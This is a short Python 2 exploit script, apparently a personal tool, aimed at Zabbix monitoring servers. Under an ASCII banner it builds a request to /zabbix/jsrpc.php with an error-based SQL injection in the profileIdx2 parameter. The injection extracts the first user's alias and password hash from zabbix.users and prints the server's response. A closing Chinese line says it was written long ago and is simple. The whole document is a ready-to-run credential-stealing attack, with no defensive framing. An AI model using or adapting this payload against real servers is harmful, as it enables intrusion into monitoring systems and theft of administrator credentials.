#/usr/bin/python #*-*coding=utf-8*-* import urllib logo = ''' _____ _ _ _ _____ _ |__ /__ _| |__ | |__ (_)_ _| ___| _ ___| | __ / // _` | '_ | '_ | / / |_ | | | |/ __| |/ / / /| (_| | |_) | |_) | |> <| _|| |_| | (__| < /____\__,_|_.__/|_.__/|_/_/\_\_| \__,_|\___|_|\_ usage:exploit(target url) ****************************** ''' print logo def exploit(url): url1 = url + "/zabbix/jsrpc.php?sid=7ec992469a75a2c8&type=&method=screen.get&mode=&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(alias,0x7e,passwd,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1" page = urllib.urlopen(url1) htmlcode = page.read() print htmlcode
很久之前写的,没啥技术含量。